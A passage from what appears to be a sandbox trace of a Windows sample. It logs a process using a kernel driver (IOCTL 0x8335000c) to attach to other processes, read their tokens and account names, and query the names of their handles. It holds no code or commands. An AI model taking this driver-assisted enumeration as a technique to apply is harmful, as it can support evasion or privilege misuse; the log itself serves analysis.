PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.779] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a904090, HandleInformation=0x0) returned 0x0 [0291.779] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.779] PsReleaseProcessExitSynchronization () returned 0x2 [0291.779] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fff8 [0291.779] ObQueryNameString (in: Object=0xffffe0006a904090, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.779] ObfDereferenceObject (Object=0xffffe0006a904090) returned 0x800e [0291.779] IoCompleteRequest () returned 0x0 [0291.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x48c) returned 0x188 [0291.780] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.780] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a06f080, HandleInformation=0x0) returned 0x0 [0291.780] ObOpenObjectByPointer (in: Object=0xffffe0006a06f080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.780] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x3000c [0291.780] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.780] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.780] IoCompleteRequest () returned 0x0 [0291.780] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.780] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.781] CloseHandle (hObject=0x18c) returned 1 [0291.781] CloseHandle (hObject=0x188) returned 1 [0291.781] PsLookupProcessByProcessId (in: ProcessId=0x48c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.781] PsAcquireProcessExitSynchronization () returned 0x0 [0291.781] KeStackAttachProcess (in: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400) [0291.781] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a80cdb0, HandleInformation=0x0) returned 0x0 [0291.781] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.781] PsReleaseProcessExitSynchronization () returned 0x2 [0291.781] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x2800a [0291.781] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.781] ObfDereferenceObject (Object=0xffffe0006a80cdb0) returned 0x7ffe [0291.781] IoCompleteRequest () returned 0x0 [0291.781] PsLookupProcessByProcessId (in: ProcessId=0x48c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.781] PsAcquireProcessExitSynchronization () returned 0x0 [0291.781] KeStackAttachProcess (in: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400) [0291.781] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000732225f0, HandleInformation=0x0) returned 0x0 [0291.781] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.781] PsReleaseProcessExitSynchronization () returned 0x2 [0291.781] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x28009 [0291.781] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.781] ObfDereferenceObject (Object=0xffffe000732225f0) returned 0x7ffe [0291.781] IoCompleteRequest () returned 0x0 [0291.781] PsLookupProcessByProcessId (in: ProcessId=0x48c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.781] PsAcquireProcessExitSynchronization () returned 0x0 [0291.781] KeStackAttachProcess (in: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06f080, ApcState=0xffffd000ac0cf400) [0291.782] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a5e9d90, HandleInformation=0x0) returned 0x0 [0291.782] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.782] PsReleaseProcessExitSynchronization () returned 0x2 [0291.782] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x28008 [0291.782] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.782] ObfDereferenceObject (Object=0xffffe0006a5e9d90) returned 0x7ffe [0291.782] IoCompleteRequest () returned 0x0 [0291.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0x188 [0291.782] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.782] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a43c840, HandleInformation=0x0) returned 0x0 [0291.782] ObOpenObjectByPointer (in: Object=0xffffe0006a43c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.782] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x38014 [0291.782] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.782] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.782] IoCompleteRequest () returned 0x0 [0291.782] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.782] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.782] CloseHandle (hObject=0x18c) returned 1 [0291.783] CloseHandle (hObject=0x188) returned 1 [0291.783] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.783] PsAcquireProcessExitSynchronization () returned 0x0 [0291.783] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.783] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e1b3d0, HandleInformation=0x0) returned 0x0 [0291.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.783] PsReleaseProcessExitSynchronization () returned 0x2 [0291.783] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x30012 [0291.783] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.783] ObfDereferenceObject (Object=0xffffe00069e1b3d0) returned 0x7ffe [0291.783] IoCompleteRequest () returned 0x0 [0291.783] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.783] PsAcquireProcessExitSynchronization () returned 0x0 [0291.783] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.783] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069976950, HandleInformation=0x0) returned 0x0 [0291.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.783] PsReleaseProcessExitSynchronization () returned 0x2 [0291.783] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x30011 [0291.783] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.783] ObfDereferenceObject (Object=0xffffe00069976950) returned 0x7ffe [0291.783] IoCompleteRequest () returned 0x0 [0291.783] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.783] PsAcquireProcessExitSynchronization () returned 0x0 [0291.783] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.783] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b1f20, HandleInformation=0x0) returned 0x0 [0291.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.783] PsReleaseProcessExitSynchronization () returned 0x2 [0291.783] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x30010 [0291.783] ObQueryNameString (in: Object=0xffffe000697b1f20, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.783] ObfDereferenceObject (Object=0xffffe000697b1f20) returned 0x7ffe [0291.783] IoCompleteRequest () returned 0x0 [0291.783] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.783] PsAcquireProcessExitSynchronization () returned 0x0 [0291.783] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.783] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068553560, HandleInformation=0x0) returned 0x0 [0291.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.783] PsReleaseProcessExitSynchronization () returned 0x2 [0291.783] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x3000f [0291.783] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.783] ObfDereferenceObject (Object=0xffffe00068553560) returned 0x7fff [0291.783] IoCompleteRequest () returned 0x0 [0291.784] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.784] PsAcquireProcessExitSynchronization () returned 0x0 [0291.784] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.784] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068ad4b90, HandleInformation=0x0) returned 0x0 [0291.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.784] PsReleaseProcessExitSynchronization () returned 0x2 [0291.784] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x3000e [0291.784] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.784] ObfDereferenceObject (Object=0xffffe00068ad4b90) returned 0x7ffe [0291.784] IoCompleteRequest () returned 0x0 [0291.784] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.784] PsAcquireProcessExitSynchronization () returned 0x0 [0291.784] KeStackAttachProcess (in: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a43c840, ApcState=0xffffd000ac0cf400) [0291.784] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0dddb0, HandleInformation=0x0) returned 0x0 [0291.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.784] PsReleaseProcessExitSynchronization () returned 0x2 [0291.784] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x3000d [0291.784] ObQueryNameString (in: Object=0xffffe0006a0dddb0, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.784] ObfDereferenceObject (Object=0xffffe0006a0dddb0) returned 0x800e [0291.784] IoCompleteRequest () returned 0x0 [0291.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xec4) returned 0x188 [0291.784] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.784] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a819080, HandleInformation=0x0) returned 0x0 [0291.784] ObOpenObjectByPointer (in: Object=0xffffe0006a819080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.784] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x27fe3 [0291.784] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.784] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.784] IoCompleteRequest () returned 0x0 [0291.784] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.784] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.785] CloseHandle (hObject=0x18c) returned 1 [0291.785] CloseHandle (hObject=0x188) returned 1 [0291.785] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.785] PsAcquireProcessExitSynchronization () returned 0x0 [0291.785] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.785] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069125d20, HandleInformation=0x0) returned 0x0 [0291.785] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.785] PsReleaseProcessExitSynchronization () returned 0x2 [0291.785] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffe1 [0291.785] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.785] ObfDereferenceObject (Object=0xffffe00069125d20) returned 0x7fff [0291.785] IoCompleteRequest () returned 0x0 [0291.785] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.785] PsAcquireProcessExitSynchronization () returned 0x0 [0291.785] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.785] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a456ac0, HandleInformation=0x0) returned 0x0 [0291.785] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.786] PsReleaseProcessExitSynchronization () returned 0x2 [0291.786] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffe0 [0291.786] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.786] ObfDereferenceObject (Object=0xffffe0006a456ac0) returned 0x7fff [0291.786] IoCompleteRequest () returned 0x0 [0291.786] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.786] PsAcquireProcessExitSynchronization () returned 0x0 [0291.786] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.786] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e2d320, HandleInformation=0x0) returned 0x0 [0291.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.786] PsReleaseProcessExitSynchronization () returned 0x2 [0291.786] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffdf [0291.786] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.786] ObfDereferenceObject (Object=0xffffe00069e2d320) returned 0x7f64 [0291.786] IoCompleteRequest () returned 0x0 [0291.786] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.786] PsAcquireProcessExitSynchronization () returned 0x0 [0291.786] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.786] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068ad4f20, HandleInformation=0x0) returned 0x0 [0291.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.786] PsReleaseProcessExitSynchronization () returned 0x2 [0291.786] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffde [0291.786] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.786] ObfDereferenceObject (Object=0xffffe00068ad4f20) returned 0xfffd [0291.786] IoCompleteRequest () returned 0x0 [0291.786] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.786] PsAcquireProcessExitSynchronization () returned 0x0 [0291.786] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.786] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a69af20, HandleInformation=0x0) returned 0x0 [0291.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.786] PsReleaseProcessExitSynchronization () returned 0x2 [0291.786] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffdd [0291.786] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.786] ObfDereferenceObject (Object=0xffffe0006a69af20) returned 0xfff8 [0291.786] IoCompleteRequest () returned 0x0 [0291.786] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.786] PsAcquireProcessExitSynchronization () returned 0x0 [0291.786] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.786] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a487720, HandleInformation=0x0) returned 0x0 [0291.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.786] PsReleaseProcessExitSynchronization () returned 0x2 [0291.786] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffdc [0291.786] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.786] ObfDereferenceObject (Object=0xffffe0006a487720) returned 0x17f95 [0291.786] IoCompleteRequest () returned 0x0 [0291.787] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.787] PsAcquireProcessExitSynchronization () returned 0x0 [0291.787] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.787] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a487720, HandleInformation=0x0) returned 0x0 [0291.787] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.787] PsReleaseProcessExitSynchronization () returned 0x2 [0291.787] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffdb [0291.787] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.787] ObfDereferenceObject (Object=0xffffe0006a487720) returned 0x17f94 [0291.787] IoCompleteRequest () returned 0x0 [0291.787] PsLookupProcessByProcessId (in: ProcessId=0xec4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.787] PsAcquireProcessExitSynchronization () returned 0x0 [0291.787] KeStackAttachProcess (in: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a819080, ApcState=0xffffd000ac0cf400) [0291.787] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fdff20, HandleInformation=0x0) returned 0x0 [0291.787] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.787] PsReleaseProcessExitSynchronization () returned 0x2 [0291.787] ObfDereferenceObject (Object=0xffffe0006a819080) returned 0x1ffda [0291.787] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, 